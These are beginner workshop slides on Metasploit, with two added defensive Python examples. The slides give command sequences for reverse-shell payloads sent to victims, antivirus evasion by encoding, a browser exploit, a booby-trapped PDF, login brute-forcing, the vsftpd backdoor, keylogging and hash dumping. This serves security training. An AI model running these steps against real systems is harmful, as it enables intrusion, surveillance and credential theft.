Metasploit Humla for Beginners


null Bangalore Chapter - June 28th 2014 Humla


By: Ajay Srivastava

Please don't expect:

- How to evade antiviruses (antivirus evasion)
- How to do pivoting
- How to do port forwarding
- How to write your own Metasploit module

Disclaimer

All the information and techniques you will learn here are for educational purposes and should not be used for malicious activities.

Agenda

- Introduction
- Basics of Metasploit
- Information gathering
- Exploitation
- (11:30-11:45 - Break 1 / Tea)*
- Meterpreter basics
- Post exploitation using Meterpreter
- Meterpreter scripts
- (1:00-2:00 - Break 2 / Lunch)*
- Metasploit utilities
- Client-side exploitation
- (4:00-4:20 - Break 3 / Tea)*
- Auxiliary modules
- And we are done

* Lunch and tea are self-sponsored.

Introduction

It's not a tool, it's a framework!!!

History

- Developed by H.D. Moore in 2003
- Originally written in Perl and later rewritten in Ruby
- Acquired by Rapid7 in 2009
- Remains open source and free to use

Metasploit Architecture

Libraries

- Rex: the basic library for most tasks; handles sockets and protocols
- MSF Core: defines the Metasploit Framework and provides the 'basic' API
- MSF Base: provides the 'friendly' API, i.e. simplified APIs for use in the Framework

Modules

- Exploit: modules used for actually attacking systems and gaining access.
- Payload: a piece of code which executes on the remote system after successful exploitation.
- Auxiliary: an exploit without a payload; used for scanning, fuzzing and various other tasks.
- Encoders: programs which encode our payload to avoid antivirus detection.
- Nops: used to keep the payload size consistent.

Payloads

- Single: completely standalone (e.g. add user)
- Stagers: create the network connection
- Stages: downloaded by the stagers (e.g. Meterpreter)

A payload is staged if the stage and stager are separated by a '/' in the payload name:

- windows/shell_bind_tcp: a single payload with no stage
- windows/shell/bind_tcp: a stager (bind_tcp) plus a stage (shell)
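Added example (not from the slides): a small Python helper that applies the naming rule above to split a payload name into platform prefix, stage and stager, and then tells a network defender which side opens the connection (bind_* means the target listens; reverse_* means the target calls out to the handler at LHOST:LPORT). The platform/arch token list is an assumption constructed for this example.

```python
from dataclasses import dataclass
from typing import Optional

# Leading platform/arch tokens seen in payload names (constructed subset for
# this example; Metasploit's real list is longer).
PLATFORM_TOKENS = {
    "windows", "linux", "osx", "bsd", "solaris", "android", "java", "php",
    "python", "ruby", "nodejs", "cmd", "unix", "generic",
    "x86", "x64", "x86_64", "aarch64", "armle", "mipsle", "mipsbe",
}

@dataclass
class PayloadInfo:
    name: str
    platform: str           # e.g. "windows" or "windows/x64"
    staged: bool
    stage: Optional[str]    # "shell", "meterpreter", ... (staged only)
    stager: Optional[str]   # "bind_tcp", "reverse_tcp", ... (staged only)
    direction: str          # "bind", "reverse" or "unknown"

def classify_payload(name: str) -> PayloadInfo:
    """Apply the slide's rule: after the platform/arch prefix, two remaining
    components mean stage/stager (staged); one component is a single payload."""
    parts = name.lower().split("/")
    i = 0
    while i < len(parts) - 1 and parts[i] in PLATFORM_TOKENS:
        i += 1
    platform, rest = "/".join(parts[:i]), parts[i:]
    if len(rest) == 2:
        stage, stager, staged = rest[0], rest[1], True
        tail = stager
    else:
        stage = stager = None
        staged, tail = False, "/".join(rest)
    # Direction decides who listens: bind_* opens a port on the target,
    # reverse_* makes the target connect out to the handler (LHOST:LPORT).
    if "reverse_" in tail:
        direction = "reverse"
    elif "bind_" in tail:
        direction = "bind"
    else:
        direction = "unknown"
    return PayloadInfo(name, platform, staged, stage, stager, direction)

def expected_connection(info: PayloadInfo, lhost: str, lport: int) -> str:
    """Describe, for a network monitor, the TCP connection this payload implies."""
    if info.direction == "reverse":
        return f"target initiates outbound TCP to {lhost}:{lport}"
    if info.direction == "bind":
        return f"target listens on TCP port {lport}; handler connects in"
    return "no network connection implied by the payload name"
```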

Interfaces

- msfconsole: the most powerful interface among all interfaces
- msfcli
- msfweb
- Armitage: the graphical version of Metasploit; developed by Raphael Mudge; supports both GUI and CLI

Basic Commands

# msfconsole
# msfupdate

msfconsole commands are classified into two types:

- Core commands
- Database commands

Core Commands

- help or ?
- banner
- version
- show
- search: msf> search <module name>
- info: msf> info <module name>
- use: msf> use <exploit/auxiliary name>
- back
- show options
- set: msf> set <option> <value>
- setg (set globally): msf> setg <option> <value>
- unset: msf> unset <option>
- unsetg: msf> unsetg <option>
- show payloads
- set payload: msf> set payload <payload name>
- check
- exploit
- run

Database Commands

Default database: PostgreSQL

database.yml: /opt/metasploit/apps/pro/ui/config/database.yml

# cat database.yml

- db_status
- db_disconnect
- db_connect: msf> db_connect user:pass@localhost:port/dbname
  or msf> db_connect -y <path of database.yml>
- db_nmap: msf> db_nmap -sV -A -O <ip range>
- hosts: msf> hosts -h
- services: msf> services
- vulns
- db_export
- db_import
- db_rebuild_cache
- creds
- db_load
- db_unload

Information Gathering

Auxiliary modules are the best!!! (Will cover in detail later.)

Using auxiliary/scanner/portscan/tcp:

msf> use auxiliary/scanner/portscan/tcp

or

# nmap <switches> <ip address>

Exploitation

- To list available exploits: msf> search <exploit name>
- To select an exploit: msf> use <exploit name>
- To get information about the selected exploit: msf exploit(name) > info
- To check the options and set arguments: msf exploit(name) > show options
- To set the target host: msf exploit(name) > set rhost <victim ip>
- To list the payloads supported by the selected exploit: msf exploit(name) > show payloads
- To set the payload: msf exploit(name) > set payload <payload name>
- To set the attacker machine: msf exploit(name) > set lhost <own ip>
- To check whether the target is vulnerable to the selected exploit: msf exploit(name) > check
- To launch the attack: msf exploit(name) > exploit

Meterpreter

- Post exploitation module
- Runs in the exploited process context
- Runs in memory and doesn't create any file on disk
- Encrypted communication
- Stable and extensible

Meterpreter Classification

- Core commands
- File system commands
- System commands
- User interface commands
- Priv commands
- Networking commands

Meterpreter: Core Commands

- background
- sessions
- ps
- migrate
- bgrun/bglist/bgkill
- resource
- run: meterpreter> run <script name>
- channel (used with execute): meterpreter> execute -f <program> -c
- use: meterpreter> use <extension name>

Meterpreter: File System Commands

- pwd
- cd
- getlwd/lcd
- ls
- cat/edit
- download/upload
- search: meterpreter> search -d <directory> -f *.<extension> -r
- mkdir/rmdir
- rm/rmdir
- del

Meterpreter: System Commands

- sysinfo
- getpid/getuid
- shell
- reboot
- shutdown
- ps

Meterpreter: UI Commands

User interface and webcam commands:

- idletime
- keyscan_start
- keyscan_dump
- keyscan_stop
- webcam_list
- webcam_snap

Meterpreter: Priv Commands

- getsystem
- hashdump
- timestomp:
  timestomp -h
  timestomp <filepath> -v  (to display all attributes)
  timestomp <filepath> -c <MM/DD/YYYY H:M:S>

Meterpreter: Networking Commands

- arp
- ipconfig/ifconfig
- netstat
- route
- portfwd

Meterpreter Scripts

Path: /usr/share/metasploit-framework/scripts/meterpreter

or

meterpreter> run <tab multiple times>

meterpreter> run <script name>

- run checkvm
- run credcollect
- run keylogrecorder
- run winenum
- run getcountermeasure
- run getgui
- run scraper
- run hostsedit
- run gettelnet
- run arp_scanner
- run vnc
- run file_collector: meterpreter> run file_collector -d <directory> -f *.txt -r

Metasploit Utilities

Three main utilities to generate shellcode and to evade antiviruses:

- msfpayload
- msfencode
- msfvenom

msfpayload

To generate a payload in different formats such as exe, C, Ruby and JavaScript.

Using msfpayload:

root@kali:~# msfpayload -h

To check options:

root@kali:~# msfpayload <payload name> O
root@kali:~# msfpayload windows/meterpreter/reverse_tcp O

Setting the options:

root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 X > exploit.exe

Send this exploit.exe to the victim.

Using the multi/handler exploit / setting up a listener

Set up the listener:

msf > search multi/handler
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
msf exploit(handler) > set lhost <attacker ip>
msf exploit(handler) > set lport 4422
msf exploit(handler) > exploit

msfencode

To bypass antiviruses:

- Alters the payload code, for example by converting it into a binary EXE; when the encoded payload runs, it decodes itself and executes the original payload in memory.
- The payload is encoded by different encoders.

root@kali:~# msfencode -h
Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>

OPTIONS:
  -e <opt>  The encoder to use
  -c <opt>  The number of times to encode the data
  -t <opt>  The output format: bash,c,java,perl,pl,py,python,raw,sh,vbscript,asp,aspx,exe
  -x <opt>  Specify an alternate executable template
  -k        Keep template working; run payload in new thread (use with -x)

List encoders:

root@kali:~# msfencode -l

msfencode with msfpayload:

root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 R | msfencode -e x86/shikata_ga_nai -c 8 -t exe > /var/www/exploitbypass.exe

Client-side Attacks

- Difficult to find server-side vulnerabilities
- Most enterprises have incoming connections locked down with firewalls
- Client-side attacks are the most common ones:
  - Browser based attacks
  - Social engineering attacks using a malicious link or file

Client-side Attacks: Browser based

Using the IE 6 based Aurora exploit:

msf > search aurora
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > show options
msf exploit(ms10_002_aurora) > set srvhost <attacker ip>
msf exploit(ms10_002_aurora) > set srvport 80
msf exploit(ms10_002_aurora) > set uripath /test
msf exploit(ms10_002_aurora) > show options
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > show options
msf exploit(ms10_002_aurora) > set lhost <own ip>
msf exploit(ms10_002_aurora) > set lport 443
msf exploit(ms10_002_aurora) > exploit

Client-side Attacks: File Format

Nowadays file format based exploits are exploiting targets in the wild.

File formats such as pdf, doc or rtf are sent as an attachment to the victim, who is expected to open it. For example:

- Adobe util.printf() buffer overflow vulnerability
- MS14-017 Microsoft Word RTF Object Confusion

Exploiting the Adobe util.printf() buffer overflow vulnerability:

msf > search adobe_utilprintf
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set filename resume.pdf
msf exploit(adobe_utilprintf) > show options
msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > setg lhost <attacker ip>
msf exploit(adobe_utilprintf) > set lport 443
msf exploit(adobe_utilprintf) > exploit

Set up a listener (i.e. multi/handler) and send this resume.pdf using some social engineering technique.

Setting up the listener on the local machine:

msf > search multi/handler
msf > use exploit/multi/handler
msf exploit(handler) > show options
msf exploit(handler) > set lhost <own ip>
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit

Auxiliary Modules

- Pre-exploitation modules
- Port scanners, fuzzers, banner grabbers, brute-force modules etc.
- Path: /usr/share/metasploit-framework/modules/auxiliary
  or, using show auxiliary in msfconsole: msf > show auxiliary
- Used without payloads
- Used the same way as exploits, but without a payload: msf> use <auxiliary name>
- 'run' command instead of 'exploit' command
- RHOSTS instead of RHOST

Auxiliary Modules: Port Scanners

The portscan auxiliary modules are used for port scanning. Using a portscanner:

msf > search portscan
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options
msf auxiliary(tcp) > set rhosts <target>
msf auxiliary(tcp) > set ports 1-100
msf auxiliary(tcp) > set threads 10
msf auxiliary(tcp) > run

Auxiliary Modules: SMB Version Fingerprinting

msf > search smb_version
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options
msf auxiliary(smb_version) > set rhosts 192.168.37.0/24
msf auxiliary(smb_version) > set threads 10
msf auxiliary(smb_version) > run

Auxiliary Modules: Version Scanner

Banner grabbing of a MySQL server:

msf > search MySQL
msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > show options
msf auxiliary(mysql_version) > set rhosts <target>
msf auxiliary(mysql_version) > run

Auxiliary Modules: Login Scanners

Testing a login attack on MySQL:

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
msf auxiliary(mysql_login) > setg rhosts <target>
msf auxiliary(mysql_login) > set user_file userfile.txt
msf auxiliary(mysql_login) > set pass_file passfile.txt
msf auxiliary(mysql_login) > set stop_on_success true
msf auxiliary(mysql_login) > run

Auxiliary Modules: Telnet

msf > search telnet_login
msf > use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > show options
msf auxiliary(telnet_login) > setg rhosts <target ip>
msf auxiliary(telnet_login) > set user_file userfile.txt
msf auxiliary(telnet_login) > set pass_file passfile.txt
msf auxiliary(telnet_login) > set stop_on_success true
msf auxiliary(telnet_login) > run

Verify:

root@kali:~# telnet <target ip>

Auxiliary Modules: Attacking FTP

msf > search ftp_version
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > show options
msf auxiliary(ftp_version) > set rhosts <target>
msf auxiliary(ftp_version) > run

Result on Metasploitable 2: FTP Banner: '220 (vsFTPd 2.3.4)'

Now checking for FTP login:

msf > search ftp_login
msf > use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set rhosts <target ip>
msf auxiliary(ftp_login) > set user_file userfile.txt
msf auxiliary(ftp_login) > set pass_file passfile.txt
msf auxiliary(ftp_login) > set stop_on_success true
msf auxiliary(ftp_login) > run

Successful FTP login for 'msfadmin':'msfadmin'
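The login scanners shown above (mysql_login, telnet_login and ftp_login driven by user_file/pass_file with stop_on_success) look alike from the server side: a burst of failed logins from one client, then a single success. As an added example that is not part of the slides, the Python below parses constructed vsftpd.log lines and flags that pattern; the log lines, the threshold of 5 failures and the 60-second window are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed vsftpd.log excerpt (not a real capture): a scan with stop_on_success
# leaves a burst of FAIL LOGIN lines, then one OK LOGIN; a single typo by a real
# user (192.168.37.20) must not alert.
SAMPLE_LOG = """\
Sat Jun 28 10:15:01 2014 [pid 2931] [msfadmin] FAIL LOGIN: Client "192.168.37.5"
Sat Jun 28 10:15:01 2014 [pid 2933] [msfadmin] FAIL LOGIN: Client "192.168.37.5"
Sat Jun 28 10:15:02 2014 [pid 2935] [msfadmin] FAIL LOGIN: Client "192.168.37.5"
Sat Jun 28 10:15:02 2014 [pid 2937] [msfadmin] FAIL LOGIN: Client "192.168.37.5"
Sat Jun 28 10:15:03 2014 [pid 2939] [msfadmin] FAIL LOGIN: Client "192.168.37.5"
Sat Jun 28 10:15:03 2014 [pid 2941] [msfadmin] OK LOGIN: Client "192.168.37.5"
Sat Jun 28 10:20:44 2014 [pid 3002] [alice] FAIL LOGIN: Client "192.168.37.20"
Sat Jun 28 10:20:51 2014 [pid 3004] [alice] OK LOGIN: Client "192.168.37.20"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)

def parse_line(line):
    """Return (timestamp, user, 'OK'|'FAIL', client_ip), or None for other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(" ".join(m["ts"].split()), "%a %b %d %H:%M:%S %Y")
    return ts, m["user"], m["result"], m["ip"]

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag client IPs with >= threshold failed logins inside any sliding window.
    Returns {ip: {"failures": n, "success_after": bool}}; success_after is the
    stop_on_success signature (a valid pair was found right after the burst)."""
    per_ip = defaultdict(list)
    for ev in filter(None, map(parse_line, log_text.splitlines())):
        per_ip[ev[3]].append(ev)
    alerts = {}
    for ip, evs in per_ip.items():
        fails = sorted(ts for ts, _, res, _ in evs if res == "FAIL")
        burst_end, lo = None, 0
        for hi, ts in enumerate(fails):          # sliding window over failures
            while ts - fails[lo] > window:
                lo += 1
            if hi - lo + 1 >= threshold:
                burst_end = ts
                break
        if burst_end is None:
            continue
        success_after = any(res == "OK" and ts >= burst_end for ts, _, res, _ in evs)
        alerts[ip] = {"failures": len(fails), "success_after": success_after}
    return alerts
```

On a real host the same check would read /var/log/vsftpd.log (or the equivalent telnet/MySQL auth log) instead of SAMPLE_LOG.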

From the FTP version scan we know its version is vsFTPd 2.3.4. Now looking for an exploit for this FTP version:

msf > search vsFTPd 2.3.4
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
msf exploit(vsftpd_234_backdoor) > set rhost <target ip>
msf exploit(vsftpd_234_backdoor) > show payloads
msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > exploit

References

- Metasploit Guide, http://packetstormsecurity.com/files/119280
- SecurityTube Metasploit Framework Expert (SMFE course by Vivek Ramachandran)
- Metasploit Unleashed, http://www.offensive-security.com/metasploit-unleashed/Main_Page
